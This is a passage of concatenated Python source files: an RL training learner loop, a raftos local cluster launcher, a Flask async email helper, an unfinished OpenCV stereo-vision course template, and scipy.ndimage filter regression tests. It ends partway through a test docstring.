            # Collect a small batch of game data.
            batch = remote_actor.sample()
            # Hand the batch to the training data queue.
            self.sample_data_queue.put(batch)

    # One training step.
    def step(self):
        """
        1. Push the latest parameters to every actor;
        2. Collect the sample data generated by all actors;
        3. Update the model parameters.
        """
        # Latest parameters of the trained model.
        latest_params = self.agent.get_weights()
        # Broadcast them to every actor thread's parameter queue.
        for params_queue in self.params_queues:
            params_queue.put(latest_params)
        train_batch = defaultdict(list)
        # Gather the batch produced by each actor.
        for i in range(self.config['actor_num']):
            sample_data = self.sample_data_queue.get()
            for key, value in sample_data.items():
                train_batch[key].append(value)
            # Track the total number of sampled steps.
            self.sample_total_steps += sample_data['obs'].shape[0]
        # Concatenate the per-actor data into one training batch.
        for key, value in train_batch.items():
            train_batch[key] = np.concatenate(value)
        # Run one learning update.
        with self.learn_time_stat:
            total_loss, pi_loss, vf_loss, entropy, lr, entropy_coeff = self.agent.learn(
                obs_np=train_batch['obs'],
                actions_np=train_batch['actions'],
                advantages_np=train_batch['advantages'],
                target_values_np=train_batch['target_values'])
        # Record the training statistics.
        self.total_loss_stat.add(total_loss)
        self.pi_loss_stat.add(pi_loss)
        self.vf_loss_stat.add(vf_loss)
        self.entropy_stat.add(entropy)
        self.lr = lr
        self.entropy_coeff = entropy_coeff

    # Write training metrics to the summary log.
    def log_metrics(self):
        # Skip if training has not started yet.
        if self.start_time is None:
            return
        # Track the best (lowest mean loss) model and save it.
        if self.best_loss is None:
            self.best_loss = self.total_loss_stat.mean
        else:
            if self.best_loss > self.total_loss_stat.mean:
                self.best_loss = self.total_loss_stat.mean
                self.save_model("model_best")
        # Write the stats to the summary log.
        summary.add_scalar('total_loss', self.total_loss_stat.mean, self.sample_total_steps)
        summary.add_scalar('pi_loss', self.pi_loss_stat.mean, self.sample_total_steps)
        summary.add_scalar('vf_loss', self.vf_loss_stat.mean, self.sample_total_steps)
        summary.add_scalar('entropy', self.entropy_stat.mean, self.sample_total_steps)
        summary.add_scalar('lr', self.lr, self.sample_total_steps)
        summary.add_scalar('entropy_coeff', self.entropy_coeff, self.sample_total_steps)
        logger.info('total_loss: {}'.format(self.total_loss_stat.mean))

    # Save the model to disk.
    def save_model(self, model_name="model"):
        # Skip if training has not started yet.
        if self.start_time is None:
            return
        save_path = os.path.join(self.config['model_path'], model_name)
        if not os.path.exists(save_path):
            os.makedirs(save_path)
        self.agent.save(save_path)

    # Whether sampling has reached the configured maximum number of steps.
    def should_stop(self):
        return self.sample_total_steps >= self.config['max_sample_steps']
if __name__ == '__main__':
    # Entry point: train until the maximum sample count, logging metrics and
    # saving the model on the configured intervals.
    learner = Learner(config)
    assert config['log_metrics_interval_s'] > 0
    assert config['save_model_interval_s'] > 0
    start1 = time.time()
    while not learner.should_stop():
        start = time.time()
        # Train repeatedly until it is time to log metrics again.
        while time.time() - start < config['log_metrics_interval_s']:
            learner.step()
        # Log the training metrics.
        learner.log_metrics()
        # Periodically save the model.
        if time.time() - start1 > config['save_model_interval_s']:
            start1 = time.time()
            learner.save_model()
    print("================ 训练结束!================")
    # Save the model one final time before exiting.
    learner.save_model("final_model")
|
run_cluster.py | #!/usr/bin/bin python3
import os
import logging
import asyncio
import random
import raftos
import raftos.serializers
from argparse import ArgumentParser
from datetime import datetime
from multiprocessing import Process
from js9 import j
logging.basicConfig(level=logging.INFO)
log = logging.getLogger()
CURRENT_DIR = os.path.dirname(os.path.abspath(__file__))
class Class:
    # Replicated value kept consistent across the raft cluster; only the
    # current leader may write it.
    data = raftos.Replicated(name='data')
def main(log_dir, node, cluster):
    """Child-process entry point: configure raftos and run one node forever.

    :param log_dir: directory for the raft log files
    :param node: "host:port" address of this node
    :param cluster: addresses of the other nodes in the cluster
    """
    # Each process needs its own event loop (this runs in a forked child).
    loop = asyncio.new_event_loop()
    raftos.configure({
        'log_path': log_dir,
        'serializer': raftos.serializers.JSONSerializer,
        'loop': loop
    })
    loop.run_until_complete(run(loop, node, cluster))
async def run(loop, node, cluster):
    """Register this node with the cluster and loop forever: the leader
    writes a random replicated record once per second, followers print the
    value they observe.

    NOTE(review): the explicit `loop=` argument to asyncio.sleep was
    deprecated in Python 3.8 and removed in 3.10 — fine only for the old
    Python versions raftos targets.
    """
    await raftos.register(node, cluster=cluster, loop=loop)
    obj = Class()
    while True:
        await asyncio.sleep(1, loop=loop)
        if raftos.get_leader() == node:
            print("###########")
            print(node)
            obj.data = {
                'id': random.randint(1, 1000),
                'data': {
                    'amount': random.randint(1, 1000) * 1000,
                    'created_at': datetime.now().strftime('%d/%m/%y %H:%M')
                }
            }
            print(obj.data)
        else:
            print("------------")
            print(node)
            print(obj.data)
if __name__ == '__main__':
    # Entry point: spawn N local raftos nodes (one process each) on
    # consecutive ports and wait for them; terminate survivors on exit.
    parser = ArgumentParser()
    parser.add_argument('-p', '--start-port', help='Start port', type=int, default=8000)
    parser.add_argument('-n', '--processes', help='Cluster size', type=int, default=3)
    parser.add_argument('-d', '--log-dir', default=os.path.abspath('logs'),
                        dest='log_dir', help="Log dir")
    args = parser.parse_args()
    os.makedirs(args.log_dir, exist_ok=True)
    # Full membership; each node's peer list is this set minus itself.
    neighbours = set(
        "127.0.0.1:{}".format(args.start_port + i) for i in range(args.processes)
    )
    processes = set([])
    try:
        for neighbour in neighbours:
            node_args = (args.log_dir, neighbour, neighbours - {neighbour})
            p = Process(target=main, args=node_args)
            log.info("%r", node_args)
            p.start()
            processes.add(p)
        # Join each process; iterate over a snapshot tuple because the set
        # is mutated inside the loop.
        while processes:
            for process in tuple(processes):
                process.join()
                processes.remove(process)
    finally:
        # Kill any node still running (e.g. on KeyboardInterrupt).
        for process in processes:
            if process.is_alive():
                log.warning('Terminating %r', process)
                process.terminate()
|
email.py | from threading import Thread
from flask import current_app
from flask_mail import Message
from app import mail
def send_async_email(app, msg):
    """Send *msg* from a worker thread.

    Flask-Mail needs an application context to read the mail configuration,
    and background threads do not inherit one — so push it explicitly.
    """
    with app.app_context():
        mail.send(msg)
# ----------------------------------------- Helper FN that sends an email -------------------------------------------
# NOTE: Flask-Mail supports some features that I'm not utilizing here such as Cc and Bcc lists. (SEE FLASK-MAIL DOCS)
# ARGS:
# - subject : Subject Line of The Email
# - sender : Sender Email Address
# - recipients : Recipient Email Address(es)
# - text_body : Non-HTML Version of the Email
# - html_body : HTML Version of the Email (This version should render whenever possible as it's prettier)
# Message FN:
# - configures the email parameters and has fields respective to the passed arguments
# -------------------------------------------------------------------------------------------------------------------
def send_email(subject, sender, recipients, text_body, html_body):
    """Compose an email and dispatch it on a background thread.

    :param subject: subject line of the email
    :param sender: sender email address
    :param recipients: recipient email address(es)
    :param text_body: plain-text version of the email
    :param html_body: HTML version of the email (rendered when supported)
    """
    message = Message(subject, sender=sender, recipients=recipients)
    message.body = text_body
    message.html = html_body
    # current_app is only a proxy; dereference it to the real application
    # object before handing it across the thread boundary.
    real_app = current_app._get_current_object()
    worker = Thread(target=send_async_email, args=(real_app, message))
    worker.start()
# -------------------------------------------------------------------------------------------------------------------
|
OpenCV3D.py | #<!--------------------------------------------------------------------------->
#<!-- ITU - IT University of Copenhagen -->
#<!-- SSS - Software and Systems Section -->
#<!-- File : OpenCV3D.py -->
#<!-- Description: Main class of this project -->
#<!-- Author : Fabricio Batista Narcizo -->
#<!-- : Rued Langgaards Vej 7 - 4D06 - DK-2300 - Copenhagen S -->
#<!-- : fabn[at]itu[dot]dk -->
#<!-- Responsible: Dan Witzner Hansen (witzner[at]itu[dot]dk) -->
#<!-- Fabricio Batista Narcizo (fabn[at]itu[dot]dk) -->
#<!-- Information: No additional information -->
#<!-- Date : 05/04/2015 -->
#<!-- Change : 05/04/2015 - Creation of these classes -->
#<!-- : 06/04/2015 - Commentaries -->
#<!-- Review : 06/04/2015 - Finalized -->
#<!--------------------------------------------------------------------------->
__version__ = '$Revision: 2015040601 $'
########################################################################
import cv2
import sys
import numpy as np
from collections import deque
from threading import Thread
from Cameras.CameraEnum import CameraEnum
from Cameras.StereoCameras import StereoCameras
from Processing.Configuration import Configuration
########################################################################
class OpenCV3D(object):
    """OpenCV3D class is the main class of this project.

    It owns the capture/processing loop (CaptureThread), the stereo
    calibration workflow, the interactive fundamental-matrix estimation
    driven by mouse clicks, and the depth-map / PLY export features.
    """
    #----------------------------------------------------------------------#
    #                            Class Attributes                          #
    #----------------------------------------------------------------------#
    # Header template for the ASCII PLY point clouds written by __SavePLY();
    # %(num)d is substituted with the number of exported vertices.
    ___plyHeader = '''ply
format ascii 1.0
element vertex %(num)d
property float x
property float y
property float z
end_header
'''
    #----------------------------------------------------------------------#
    #                            Class Properties                          #
    #----------------------------------------------------------------------#
    @property
    def Image(self):
        """Get the last processed image."""
        return self.__image

    @Image.setter
    def Image(self, value):
        """Set the last processed image."""
        self.__image = value

    @property
    def PointsQueue(self):
        """Get the queue with selected points."""
        return self.__pointsQueue

    @PointsQueue.setter
    def PointsQueue(self, value):
        """Set the queue with selected points."""
        self.__pointsQueue = value

    @property
    def IsCalibrating(self):
        """Check if the calibration process is running."""
        return self.__isCalibrating

    @IsCalibrating.setter
    def IsCalibrating(self, value):
        """Set that the calibration process starts."""
        self.__isCalibrating = value

    @property
    def IsSaving(self):
        """Check if the PLY save file process is running."""
        return self.__isSaving

    @IsSaving.setter
    def IsSaving(self, value):
        """Set that the PLY save process starts."""
        self.__isSaving = value

    @property
    def IsFrozen(self):
        """Check if the fundamental matrix process is running."""
        return self.__isFrozen

    @IsFrozen.setter
    def IsFrozen(self, value):
        """Set that the fundamental matrix process is running."""
        self.__isFrozen = value

    #----------------------------------------------------------------------#
    #                      OpenCV3D Class Constructor                      #
    #----------------------------------------------------------------------#
    def __init__(self):
        """OpenCV3D Class Constructor."""
        self.Clear()

    def __del__(self):
        """OpenCV3D Class Destructor."""
        # Stops the main thread system.
        # NOTE(review): Stop() reads self.__isRunning, which is only set by
        # Start(); destroying an instance that was never started would raise
        # an AttributeError here — confirm Start() is always called first.
        self.Stop()

    #----------------------------------------------------------------------#
    #                         Public Class Methods                         #
    #----------------------------------------------------------------------#
    def Start(self):
        """Start a new thread for managing the system.

        The worker-thread start is currently commented out, so the caller is
        expected to invoke CaptureThread() directly. Always returns True.
        """
        self.__isRunning = True
        #self.__thread = Thread(target=self.__CaptureThread)
        #self.__thread.start()
        return True

    def Stop(self):
        """Stop the main thread.

        Returns False when the system was not running, True otherwise.
        """
        if self.__isRunning is not True:
            return False
        self.__isRunning = False
        #self.__thread.join(1000)
        return True

    def Clear(self):
        """Empty all internal parameters used for this class."""
        self.hasFundamentalMatrix = self.IsCalibrating = self.IsSaving = self.IsFrozen = False
        # Holds up to 16 clicked points (8 left/right pairs) used by the
        # fundamental-matrix estimation.
        self.PointsQueue = deque(maxlen=16)

    #----------------------------------------------------------------------#
    #                         Private Class Methods                        #
    #----------------------------------------------------------------------#
    def CaptureThread(self):
        """Main thread of this system."""
        # Creates a window to show the original images.
        cv2.namedWindow("Original", cv2.WINDOW_AUTOSIZE)
        cv2.setMouseCallback("Original", self.mouseEvent)
        #cameraOneCap=cv2.VideoCapture(0)
        #cameraTwoCap=cv2.VideoCapture(2)
        # Creates a window to show the stereo images.
        cv2.namedWindow("Stereo", cv2.WINDOW_AUTOSIZE)
        # Creates a window to show the depth map.
        cv2.namedWindow("DepthMap", cv2.WINDOW_AUTOSIZE)
        cv2.createTrackbar("minDisparity", "DepthMap", 1, 32, self.__SetMinDisparity)
        cv2.createTrackbar("blockSize", "DepthMap", 1, 5, self.__SetNothing)
        # Repetition statement for analyzing each captured image.
        while True:
            # Check if the fundamental matrix process is running.
            if not self.IsFrozen:
                # Grabs the next frame from capturing device.
                StereoCameras.Instance.Grab()
                # Decodes and returns the grabbed video frames.
                leftImage, rightImage = StereoCameras.Instance.Retrieve()
                # Find the pattern in the image.
                leftCorners = Configuration.Instance.Pattern.FindCorners(leftImage)
                rightCorners = Configuration.Instance.Pattern.FindCorners(rightImage)
                # Check if the calibration process is running.
                if self.IsCalibrating:
                    # If both pattern have been recognized, start the calibration process.
                    if leftCorners is not None and rightCorners is not None:
                        self.__Calibrate(leftCorners, rightCorners)
                    # Otherwise, stop the calibrations process.
                    else:
                        self.IsCalibrating = False
                # Check if the system is calibrated.
                elif Configuration.Instance.Calibration.IsCalibrated:
                    # Estimate the depth map from two stereo images.
                    self.__DepthMap(leftImage, rightImage)
                # Combine two stereo images in only one window.
                self.Image = self.__CombineImages(leftImage, rightImage, 1)
                cv2.imshow("Original", self.Image)
            # Check what the user wants to do.
            inputKey = cv2.waitKey(1)
            # Esc or letter "q" key: quit the loop.
            if inputKey == 27 or inputKey == ord("q"):
                break
            # Space key: start the calibration process.
            elif inputKey == 32:
                self.IsCalibrating = True
            # Letter "s" key: request a PLY export on the next depth map.
            elif inputKey == ord("s"):
                self.IsSaving = True
            # Letter "f" key: toggle the frozen (point-selection) state.
            elif inputKey == ord("f"):
                self.IsFrozen = not self.IsFrozen
        # Closes all video capturing devices.
        StereoCameras.Instance.Release()
        # Close all OpenCV windows.
        cv2.destroyAllWindows()

    def __FundamentalMatrix(self, point):
        """Collect clicked point pairs and estimate the fundamental matrix.

        Called for each left-button click while the image is frozen; once 16
        points (8 left/right pairs) are queued, it estimates F and draws the
        corresponding epipolar lines on both halves of the combined window.
        """
        # Check if the image is frozen.
        # SIGB: The user can frozen the input image presses "f" key.
        if self.IsFrozen:
            # Insert the new selected point in the queue.
            if self.__UpdateQueue(point):
                # Get all points selected by the user.
                points = np.asarray(self.PointsQueue, dtype=np.float32)
                # <000> Get the selected points from the left and right images.
                # Even queue indices are clicks on the left half, odd indices
                # on the right half (see __UpdateQueue).
                pointsLeft,pointsRight=[],[]
                # NOTE(review): xrange is Python 2 only — this file predates
                # Python 3 (use range there).
                for i in xrange(0,16):
                    if i % 2 ==0:
                        pointLeft=points[i]
                        pointsLeft.append(pointLeft)
                    elif i % 2 ==1:
                        pointRight=points[i]
                        pointsRight.append(pointRight)
                pointsLeft=np.array(pointsLeft, dtype=np.float32)
                pointsRight=np.array(pointsRight, dtype=np.float32)
                # <001> Estimate the Fundamental Matrix.
                FundMat,mask1=cv2.findFundamentalMat(pointsLeft,pointsRight)
                # <002> Save the Fundamental Matrix in the F attribute of the CamerasParameters class.
                StereoCameras.Instance.Parameters.F=FundMat
                # Get each point from left image.
                for pt in pointsLeft:
                    # <003> Estimate the epipolar line.
                    lineEpi=cv2.computeCorrespondEpilines(np.array([pt]), 1, StereoCameras.Instance.Parameters.F)
                    # <004> Define the initial and final points of the line.
                    # The 1280 offset maps the line onto the right half of the
                    # side-by-side window (assumes each frame is 1280 px wide
                    # — TODO confirm against the capture resolution).
                    initialP=(1280+(int(-lineEpi[0,0,2]/lineEpi[0,0,0])),0)
                    FinalP=(1280,int(-lineEpi[0,0,2]/lineEpi[0,0,1]))
                    # <005> Draws the epipolar line in the input image.
                    cv2.line(self.Image, initialP, FinalP, (255,0,0))
                # Get each point from right image.
                for pt in pointsRight:
                    # <006> Estimate the epipolar line.
                    lineEpi=cv2.computeCorrespondEpilines(np.array([pt]), 2, StereoCameras.Instance.Parameters.F)
                    initialP=(int(-lineEpi[0,0,2]/lineEpi[0,0,0]),0)
                    FinalP=(0,int(-lineEpi[0,0,2]/lineEpi[0,0,1]))
                    cv2.line(self.Image, initialP, FinalP, (0,0,255))
                # Show the final result of this process to the user.
                cv2.imshow("Original", self.Image)
                # Update the fundamental matrix flag and release the system.
                self.hasFundamentalMatrix = True

    def __Calibrate(self, leftCorners, rightCorners):
        """Calibrate the stereo camera for each new detected pattern."""
        # Get The outer vector contains as many elements as the number of the pattern views.
        objectPoints = Configuration.Instance.Pattern.CalculePattern()
        # <007> Insert the pattern detection results in three vectors.
        # Get the parameters used for calibrating each stereo camera.
        # NOTE(review): the leftCorners/rightCorners arguments are overwritten
        # here with the accumulated vectors stored in the Pattern singleton.
        leftCorners = Configuration.Instance.Pattern.LeftCorners
        rightCorners = Configuration.Instance.Pattern.RightCorners
        objectPoints = Configuration.Instance.Pattern.ObjectPoints
        # <008> Finds the camera intrinsic and extrinsic parameters from several views of a calibration pattern.
        # <008> Write the camera intrinsic and extrinsic parameters.
        # Calibrates the stereo camera.
        # NOTE(review): R and T are currently unused; steps <015>/<016>
        # (rectification and undistortion maps) are not implemented yet.
        R, T = Configuration.Instance.Calibration.StereoCalibrate(leftCorners, rightCorners, objectPoints)
        # <015> Computes rectification transforms for each head of a calibrated stereo camera.
        # <016> Computes the undistortion and rectification transformation maps.
        # End the calibration process.
        self.IsCalibrating = False
        # Stop the system for 1 second, because the user will see the processed images.
        cv2.waitKey(1000)

    def __Epipolar(self, point):
        """Define the points used during the fundamental matrix process."""
        pass

    def __DepthMap(self, leftImage, rightImage):
        """Estimate the depth map from two stereo images.

        NOTE(review): template steps <017>-<019> are not implemented, so the
        local names disparity/leftStereo/rightStereo used below are undefined
        and this method raises NameError if executed as-is.
        """
        # <017> Create the stereo image.
        # <018> Get the attributes for the block matching algorithm.
        # SIGB: minDisparity needs to be divisible by 16 and block size needs to be an odd number.
        # <019> Computing a stereo correspondence using the block matching algorithm.
        # Check if it is necessary to save the PLY file.
        if self.IsSaving:
            self.__SavePLY(disparity, leftStereo)
        # <020> Normalizes the disparity image for a valid output OpenCV image.
        # Shows the disparity image.
        cv2.imshow("DepthMap", disparity)
        # Combine two stereo images in only one window.
        stereo = self.__CombineImages(leftStereo, rightStereo, 1)
        cv2.imshow("Stereo", stereo)

    def __SavePLY(self, disparity, image):
        """Reproject the disparity image to 3D and write an ASCII PLY file."""
        # Check if the system is calibrated.
        if Configuration.Instance.Calibration.IsCalibrated:
            # Get a 4x4 disparity-to-depth mapping matrix.
            Q = StereoCameras.Instance.Parameters.Q
            # Reprojects a disparity image to 3D space.
            points = cv2.reprojectImageTo3D(disparity, Q)
            # Creates a mask of the depth mapping matrix.
            # Keep only pixels whose disparity is above the minimum value.
            mask = disparity > disparity.min()
            points = points[mask].reshape(-1, 3)
            # Defines the output numpy array.
            output = points
            # Save the output file.
            with open("OpenCV3D.ply", "w") as filename:
                filename.write(OpenCV3D.___plyHeader % dict(num = len(output)))
                np.savetxt(filename, output, "%f %f %f", newline="\n")
        # End the PLY save process.
        self.IsSaving = False

    def __CombineImages(self, image1, image2, scale=1):
        """Combine two image in only one visualization (side by side)."""
        # Define the final size.
        height, width = image1.shape[:2]
        width = int(width * scale)
        height = int(height * scale)
        # Define the new size to input images.
        image1 = cv2.resize(image1, (width, height))
        image2 = cv2.resize(image2, (width, height))
        # Create the final image.
        image = np.zeros((height, width * 2, 3), dtype=np.uint8)
        image[:height, :width ] = image1
        image[:height, width:width * 2] = image2
        # Return the combine images.
        return image

    #----------------------------------------------------------------------#
    #                     Class Action Events Methods                      #
    #----------------------------------------------------------------------#
    def mouseEvent(self, event, x, y, flag, param):
        """This is an example of a calibration process using the mouse clicks."""
        # Left click: epipolar lookup once F is known, otherwise collect
        # points for the fundamental-matrix estimation.
        if event == cv2.EVENT_LBUTTONDOWN:
            if self.hasFundamentalMatrix:
                self.__Epipolar((x, y))
            else:
                self.__FundamentalMatrix((x, y))
        # Reset all configuration variables.
        elif event == cv2.EVENT_MBUTTONDOWN:
            self.Clear()
            Configuration.Instance.Clear()
        # Starts the calibration process.
        elif event == cv2.EVENT_RBUTTONUP:
            self.IsCalibrating = True

    def __UpdateQueue(self, point):
        """Insert a new point in the queue.

        Returns True when the queue is (or becomes) full — i.e. the caller
        may start the fundamental-matrix estimation — False otherwise.
        """
        # Get the current queue size.
        size = len(self.PointsQueue)
        # Check if the queue is full.
        if size == self.PointsQueue.maxlen:
            return True
        # Defines the color used for draw the circle and the line.
        # Red for even (left-half) clicks, blue for odd (right-half) ones.
        color = (0, 0, 255) if size % 2 == 0 else (255, 0, 0)
        # Draw a circle in the selected point.
        cv2.circle(self.Image, point, 3, color, thickness=-1)
        cv2.imshow("Original", self.Image)
        # Adjust the right click to correct position.
        # NOTE(review): assumes each frame is 1280 px wide — confirm against
        # the capture resolution.
        if size % 2 != 0:
            point = (point[0] - 1280, point[1])
        # It is necessary to update the selected point, because the systems shows a resized input image.
        # SIBG: You can use the original size, if you call __CombineImages() method with scale factor value 1.0.
        point = (point[0], point[1], 1)
        # Insert the new point in the queue.
        self.PointsQueue.append(point)
        # Check if the queue is full now.
        if size + 1 == self.PointsQueue.maxlen:
            return True
        # It is necessary to add more points.
        return False

    def __SetMinDisparity(self, value):
        """Masks the minDisparity variable (trackbar callback).

        Keeps the trackbar value at a minimum of 1.
        """
        if value == 0:
            cv2.setTrackbarPos("minDisparity", "DepthMap", int(1))

    def __SetNothing(self, value):
        """Standard mask (no-op trackbar callback)."""
        pass
#----------------------------------------------------------------------#
# Main Methods #
#----------------------------------------------------------------------#
def main(argv):
    """Entry point: build the application, start it and run the capture loop."""
    app = OpenCV3D()
    app.Start()
    app.CaptureThread()

if __name__ == '__main__':
    sys.exit(main(sys.argv))
|
test_filters.py | ''' Some tests for filters '''
from __future__ import division, print_function, absolute_import
import sys
import numpy as np
from numpy.testing import (assert_equal, assert_allclose,
assert_array_equal, assert_almost_equal)
from pytest import raises as assert_raises
import scipy.ndimage as sndi
from scipy.ndimage.filters import _gaussian_kernel1d, rank_filter
from scipy._lib._numpy_compat import suppress_warnings
def test_ticket_701():
    # Regression test: generic_filter must accept a scalar size as well as
    # a tuple size and produce identical output.
    data = np.arange(4).reshape((2, 2))

    def window_min(window):
        return np.min(window)

    from_tuple = sndi.generic_filter(data, window_min, size=(1, 1))
    # The following raises an error unless ticket 701 is fixed
    from_scalar = sndi.generic_filter(data, window_min, size=1)
    assert_equal(from_tuple, from_scalar)
def test_gh_5430():
    """Regression test for gh-5430: _normalize_sequence on numpy ints.

    At least one of these raises an error unless gh-5430 is fixed. In py2k
    an int is implemented using a C long, so which one fails depends on the
    system. In py3k there is only one arbitrary precision integer type, so
    both should fail.
    """
    for sigma in (np.int32(1), np.int64(1), 1):
        out = sndi._ni_support._normalize_sequence(sigma, 1)
        assert_equal(out, [sigma])
    # Sequences were already handled correctly; make sure they still are.
    sigma = [1, 1]
    out = sndi._ni_support._normalize_sequence(sigma, 2)
    assert_equal(out, sigma)
    # Also include the OP's original example to make sure we fixed the issue.
    x = np.random.normal(size=(256, 256))
    perlin = np.zeros_like(x)
    for i in 2**np.arange(6):
        # FIX: use the public sndi.gaussian_filter — the legacy
        # scipy.ndimage.filters namespace was deprecated and removed.
        perlin += sndi.gaussian_filter(x, i, mode="wrap") * i**2
    # This also fixes gh-4106; show that the OP's example now runs.
    x = np.int64(21)
    sndi._ni_support._normalize_sequence(x, 0)
def test_gaussian_kernel1d():
    # Compare _gaussian_kernel1d against analytic Gaussian derivatives
    # of orders 0 through 3.
    radius = 10
    sigma = 2
    var = sigma * sigma
    x = np.arange(-radius, radius + 1, dtype=np.double)
    phi = np.exp(-0.5 * x * x / var)
    phi /= phi.sum()
    references = [
        phi,
        -phi * x / var,
        phi * (x * x / var - 1) / var,
        phi * (3 - x * x / var) * x / (var * var),
    ]
    for order, reference in enumerate(references):
        assert_allclose(reference, _gaussian_kernel1d(sigma, order, radius))
def test_orders_gauss():
    # Valid derivative orders (0 and 3) of a zero input give zero output;
    # negative orders must be rejected with ValueError.
    zeros = np.zeros((1,))
    for order in (0, 3):
        assert_equal(0, sndi.gaussian_filter(zeros, 1, order=order))
        assert_equal(0, sndi.gaussian_filter1d(zeros, 1, axis=-1, order=order))
    assert_raises(ValueError, sndi.gaussian_filter, zeros, 1, -1)
    assert_raises(ValueError, sndi.gaussian_filter1d, zeros, 1, -1, -1)
def test_valid_origins():
    """Regression test for #1311: out-of-range origins must raise ValueError."""
    func = lambda x: np.mean(x)
    data = np.array([1, 2, 3, 4, 5], dtype=np.float64)
    assert_raises(ValueError, sndi.generic_filter, data, func, size=3,
                  origin=2)
    # NOTE(review): the original defined an unused two-argument lambda here;
    # generic_filter1d validates the origin before invoking the callback, so
    # the single-argument func is sufficient — the unused local was removed.
    assert_raises(ValueError, sndi.generic_filter1d, data, func,
                  filter_size=3, origin=2)
    assert_raises(ValueError, sndi.percentile_filter, data, 0.2, size=3,
                  origin=2)
    # Renamed from "filter" to avoid shadowing the builtin.
    for filt in [sndi.uniform_filter, sndi.minimum_filter,
                 sndi.maximum_filter, sndi.maximum_filter1d,
                 sndi.median_filter, sndi.minimum_filter1d]:
        # This should work, since for size == 3, the valid range for origin is
        # -1 to 1.
        list(filt(data, 3, origin=-1))
        list(filt(data, 3, origin=1))
        # Just check this raises an error instead of silently accepting or
        # segfaulting.
        assert_raises(ValueError, filt, data, 3, origin=2)
def test_bad_convolve_and_correlate_origins():
    """Regression test for gh-822."""
    # Before gh-822 was fixed, these would generate seg. faults or
    # other crashes on many systems.
    bad_calls = [
        (sndi.correlate1d, ([0, 1, 2, 3, 4, 5], [1, 1, 2, 0]), {'origin': 2}),
        (sndi.correlate, ([0, 1, 2, 3, 4, 5], [0, 1, 2]), {'origin': [2]}),
        (sndi.correlate, (np.ones((3, 5)), np.ones((2, 2))), {'origin': [0, 1]}),
        (sndi.convolve1d, (np.arange(10), np.ones(3)), {'origin': -2}),
        (sndi.convolve, (np.arange(10), np.ones(3)), {'origin': [-2]}),
        (sndi.convolve, (np.ones((3, 5)), np.ones((2, 2))), {'origin': [0, -2]}),
    ]
    for func, args, kwargs in bad_calls:
        assert_raises(ValueError, func, *args, **kwargs)
def test_multiple_modes():
    # Filters that accept one mode per axis must reproduce the single-mode
    # result when every axis uses the same mode.
    arr = np.array([[1., 0., 0.],
                    [1., 1., 0.],
                    [0., 0., 0.]])
    single = 'reflect'
    per_axis = ['reflect', 'reflect']
    assert_equal(sndi.gaussian_filter(arr, 1, mode=single),
                 sndi.gaussian_filter(arr, 1, mode=per_axis))
    for filt in (sndi.prewitt, sndi.sobel, sndi.laplace):
        assert_equal(filt(arr, mode=single), filt(arr, mode=per_axis))
    assert_equal(sndi.gaussian_laplace(arr, 1, mode=single),
                 sndi.gaussian_laplace(arr, 1, mode=per_axis))
    for filt in (sndi.maximum_filter, sndi.minimum_filter):
        assert_equal(filt(arr, size=5, mode=single),
                     filt(arr, size=5, mode=per_axis))
    assert_equal(sndi.gaussian_gradient_magnitude(arr, 1, mode=single),
                 sndi.gaussian_gradient_magnitude(arr, 1, mode=per_axis))
    assert_equal(sndi.uniform_filter(arr, 5, mode=single),
                 sndi.uniform_filter(arr, 5, mode=per_axis))
def test_multiple_modes_sequentially():
    # A multi-mode n-D filter must equal applying the corresponding 1-D
    # filter once per axis with the per-axis modes.
    arr = np.array([[1., 0., 0.],
                    [1., 1., 0.],
                    [0., 0., 0.]])
    modes = ['reflect', 'wrap']

    def chain_1d(filter1d, **kwargs):
        # Apply the 1-D filter along axis 0 then axis 1, one mode each.
        out = filter1d(arr, axis=0, mode=modes[0], **kwargs)
        return filter1d(out, axis=1, mode=modes[1], **kwargs)

    assert_equal(chain_1d(sndi.gaussian_filter1d, sigma=1),
                 sndi.gaussian_filter(arr, 1, mode=modes))
    assert_equal(chain_1d(sndi.uniform_filter1d, size=5),
                 sndi.uniform_filter(arr, 5, mode=modes))
    assert_equal(chain_1d(sndi.maximum_filter1d, size=5),
                 sndi.maximum_filter(arr, size=5, mode=modes))
    assert_equal(chain_1d(sndi.minimum_filter1d, size=5),
                 sndi.minimum_filter(arr, size=5, mode=modes))
def test_multiple_modes_prewitt():
    # Prewitt filter with a different extrapolation mode per axis.
    image = np.array([[1., 0., 0.],
                      [1., 1., 0.],
                      [0., 0., 0.]])
    reference = np.array([[1., -3., 2.],
                          [1., -2., 1.],
                          [1., -1., 0.]])
    assert_equal(reference, sndi.prewitt(image, mode=['reflect', 'wrap']))
def test_multiple_modes_sobel():
    # Sobel filter with a different extrapolation mode per axis.
    image = np.array([[1., 0., 0.],
                      [1., 1., 0.],
                      [0., 0., 0.]])
    reference = np.array([[1., -4., 3.],
                          [2., -3., 1.],
                          [1., -1., 0.]])
    assert_equal(reference, sndi.sobel(image, mode=['reflect', 'wrap']))
def test_multiple_modes_laplace():
    # Laplace filter with a different extrapolation mode per axis.
    image = np.array([[1., 0., 0.],
                      [1., 1., 0.],
                      [0., 0., 0.]])
    reference = np.array([[-2., 2., 1.],
                          [-2., -3., 2.],
                          [1., 1., 0.]])
    assert_equal(reference, sndi.laplace(image, mode=['reflect', 'wrap']))
def test_multiple_modes_gaussian_laplace():
    # gaussian_laplace with a different extrapolation mode per axis.
    image = np.array([[1., 0., 0.],
                      [1., 1., 0.],
                      [0., 0., 0.]])
    reference = np.array([[-0.28438687, 0.01559809, 0.19773499],
                          [-0.36630503, -0.20069774, 0.07483620],
                          [0.15849176, 0.18495566, 0.21934094]])
    assert_almost_equal(reference,
                        sndi.gaussian_laplace(image, 1, mode=['reflect', 'wrap']))
def test_multiple_modes_gaussian_gradient_magnitude():
    # gaussian_gradient_magnitude with a different extrapolation mode
    # per axis.
    image = np.array([[1., 0., 0.],
                      [1., 1., 0.],
                      [0., 0., 0.]])
    reference = np.array([[0.04928965, 0.09745625, 0.06405368],
                          [0.23056905, 0.14025305, 0.04550846],
                          [0.19894369, 0.14950060, 0.06796850]])
    result = sndi.gaussian_gradient_magnitude(image, 1, mode=['reflect', 'wrap'])
    assert_almost_equal(reference, result)
def test_multiple_modes_uniform():
    # uniform_filter with a different extrapolation mode per axis.
    image = np.array([[1., 0., 0.],
                      [1., 1., 0.],
                      [0., 0., 0.]])
    reference = np.array([[0.32, 0.40, 0.48],
                          [0.20, 0.28, 0.32],
                          [0.28, 0.32, 0.40]])
    assert_almost_equal(reference,
                        sndi.uniform_filter(image, 5, mode=['reflect', 'wrap']))
def test_gaussian_truncate():
    """Gaussian filters can be truncated at different widths.

    These checks only verify that the result has the expected number of
